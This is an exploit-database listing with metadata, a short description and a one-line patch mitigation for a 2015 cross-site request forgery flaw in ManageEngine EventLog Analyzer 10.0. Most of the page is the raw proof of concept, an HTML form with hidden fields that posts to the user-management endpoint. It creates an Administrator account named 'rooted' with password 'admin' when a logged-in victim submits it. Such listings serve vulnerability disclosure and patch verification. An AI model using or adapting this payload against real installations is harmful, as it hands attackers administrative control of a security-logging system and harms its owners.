header-logo
Suggest Exploit
vendor:
EventLog Analyzer
by:
Akash S. Chavan
8.8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: EventLog Analyzer
Affected Version From: 10
Affected Version To: 10
Patch Exists: YES
Related CWE: N/A
CPE: a:manageengine:eventlog_analyzer:10.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8.1/PostgreSQL
2015

ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery Exploit

This exploit allows an attacker to add a new administrator user to the ManageEngine EventLog Analyzer Version 10.0. The attacker can craft a malicious HTML page with a form that contains hidden fields with values that will be used to add a new administrator user. When the victim visits the malicious page, the form will be automatically submitted and the new administrator user will be added.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is up to date and that all security patches are applied.
Source

Exploit-DB raw data:

<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->

<html>
	<body>
    <form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
      <input type="hidden" name="domainId" value="" />
      <input type="hidden" name="roleId" value="" />
      <input type="hidden" name="addField" value="true" />
      <input type="hidden" name="userType" value="Administrator" />
      <input type="hidden" name="userName" value="rooted" />
      <input type="hidden" name="pwd1" value="admin" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="userGroup" value="Administrator" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="AddSubmit" value="Add&#32;User" />
      <input type="hidden" name="alpha" value="" />
      <input type="hidden" name="userIds" value="" />
      <input type="hidden" name="roleName" value="" />
      <input type="hidden" name="selDevices" value="" />
      <input type="hidden" name="doAction" value="" />
      <input type="hidden" name="productName" value="eventlog" />
      <input type="hidden" name="licType" value="Prem" />
      <input type="hidden" name="next" value="" />
      <input type="hidden" name="currentUserId" value="1" />
      <input type="hidden" name="isAdminServer" value="false" />
      <input type="submit" value="Click Me" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR